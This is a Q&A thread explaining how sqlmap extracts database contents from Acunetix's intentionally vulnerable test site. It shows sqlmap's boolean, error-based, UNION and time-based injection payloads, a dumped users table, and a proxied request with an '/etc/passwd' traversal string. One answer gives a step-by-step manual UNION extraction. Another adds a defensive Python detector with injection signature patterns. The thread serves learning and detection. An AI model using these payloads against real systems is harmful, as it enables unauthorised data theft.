web-dev-qa-db-ja.com

How sqlmap retrieves all the database information

I am curious how sqlmap is able to retrieve all of the information from the database. I am using Burp as a proxy to view every request and response. From the responses I could not see any information related to the database, yet sqlmap was able to display the relevant information. For example, with sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --proxy="http://192.168.0.115:8181" it can retrieve the records from the users table in the acuart db.

Here is the sqlmap output:

[*] starting at 17:55:43

[17:55:43] [INFO] resuming back-end DBMS 'mysql' 
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7494=7494

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(Rand(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart | pass | uname | phone   | email           | address   |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0    | test | test  | 2323345 | [email protected] | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+

[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 17:55:49

Request seen in the proxy:

GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store

Response seen in the proxy:

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
  <div id="globalNav"> 
        <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
    <td align="left">
        <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
        </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
        <a href="guestbook.php">guestbook</a> | 
        <a href="AJAX/index.php">AJAX Demo</a>
    </td>
    <td align="right">
        </td>
    </tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
    <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <input name="searchFor" type="text" size="10"> 
      <input name="goButton" type="submit" value="go"> 
    </form> 
  </div> 
  <div id="sectionLinks"> 
    <ul> 
      <li><a href="categories.php">Browse categories</a></li> 
      <li><a href="artists.php">Browse artists</a></li> 
      <li><a href="cart.php">Your cart</a></li> 
      <li><a href="login.php">Signup</a></li>
      <li><a href="userinfo.php">Your profile</a></li>
      <li><a href="guestbook.php">Our guestbook</a></li>
        <li><a href="AJAX/index.php">AJAX Demo</a></li>
      </li> 
    </ul> 
  </div> 
  <div class="relatedLinks"> 
    <h3>Links</h3> 
    <ul> 
      <li><a href="http://www.acunetix.com">Security art</a></li> 
      <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
        <param name="movie" value="Flash/add.swf">
        <param name=quality value=high>
        <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
      </object>
    </p>
  </div> 
</div> 

<!--end navbar --> 
<div id="siteInfo">  <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> | &copy;2006
  Acunetix Ltd 
</div> 
<br> 
</div>
</body>
<!-- InstanceEnd --></html>

Your explanation would be greatly appreciated. Thank you.

1
overshadow

It looks like there is a problem with the request you posted. Since the vulnerable parameter is the "cat" parameter, the "&" in the request separates the payload from the vulnerable parameter, and as a result no information is disclosed.

Let's do it properly:

Request:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-

You will get an error message telling you that the number of columns differs from that of the original query.

Error: The used SELECT statements have a different number of columns

Increase the number of columns (add comma-separated numbers) until the message disappears, and you will find that the number of columns has to be 11.

This is because the following request gives a valid page:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables-%20-

You will notice that many items were added to the page. The numbers 7, 2 and 9 are easy to spot in each item. Replace one of them with the information you want to receive (table_name from information_schema.tables) and you get the information you were looking for:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables-%20-

(the users table is in the last item)

Using the same spot you can extract all the other information you are looking for; just change the column you want to receive and the table that holds the data.

3
Denis
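Added here as a defender's-side illustration, not part of this thread or of sqlmap: a small Python checker that percent-decodes each query-string chunk before splitting on "=", so a payload carried in a separate parameter (the MkFN chunk in the proxied request above) is inspected the same way as one inside cat, and that flags the techniques named in the sqlmap output (UNION, information_schema, boolean, time-based, error-based). The request lines are constructed from the ones shown in this thread; the pattern names are my own.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample requests modelled on the ones in this thread: sqlmap's request
# (payload in a separate parameter), the answer's hand-built UNION request, a benign one.
SAMPLE_REQUESTS = [
    ("GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201"
     "%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20"
     "..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1", "sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)"),
    ("GET /listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,"
     "6,7,8,9,10,11%20from%20information_schema.tables--%20- HTTP/1.1", "Mozilla/5.0"),
    ("GET /listproducts.php?cat=1 HTTP/1.1", "Mozilla/5.0"),
]

# Signatures for the injection techniques listed in the sqlmap output above.
SQLI_PATTERNS = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("boolean_tautology", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("time_based", re.compile(r"\bsleep\s*\(", re.I)),
    ("error_based", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("path_traversal", re.compile(r"\.\./")),
]

def decode_params(query):
    """Split on '&' and percent-decode each chunk BEFORE splitting on '='.
    sqlmap's chunk encodes its '=' as %3D, so urllib's parse_qsl would silently
    drop it (no literal '=') and the payload would never be inspected."""
    params = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = unquote_plus(chunk).partition("=")
            params.append((name, value))
    return params

def analyze_request(request_line, user_agent):
    """Report which parameters carry injection signatures and whether the UA is sqlmap."""
    _method, target, _version = request_line.split(" ", 2)
    hits = {}
    for name, value in decode_params(urlsplit(target).query):
        matched = [label for label, rx in SQLI_PATTERNS if rx.search(name + "=" + value)]
        if matched:
            hits[name] = matched
    sqlmap_ua = "sqlmap" in user_agent.lower()
    return {"suspicious_params": hits, "sqlmap_ua": sqlmap_ua, "alert": bool(hits) or sqlmap_ua}

if __name__ == "__main__":
    for line, ua in SAMPLE_REQUESTS:
        print(analyze_request(line, ua))
```

Note that the first sample is flagged on the MkFN parameter even though the application itself never evaluates that chunk, which is exactly why a monitoring rule should decode every chunk rather than trust the parameter split.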

This thread is quite old, but for anyone who wants to know how sqlmap works: use -v6 (verbosity level 6) while running the sqlmap command.

1
user2593869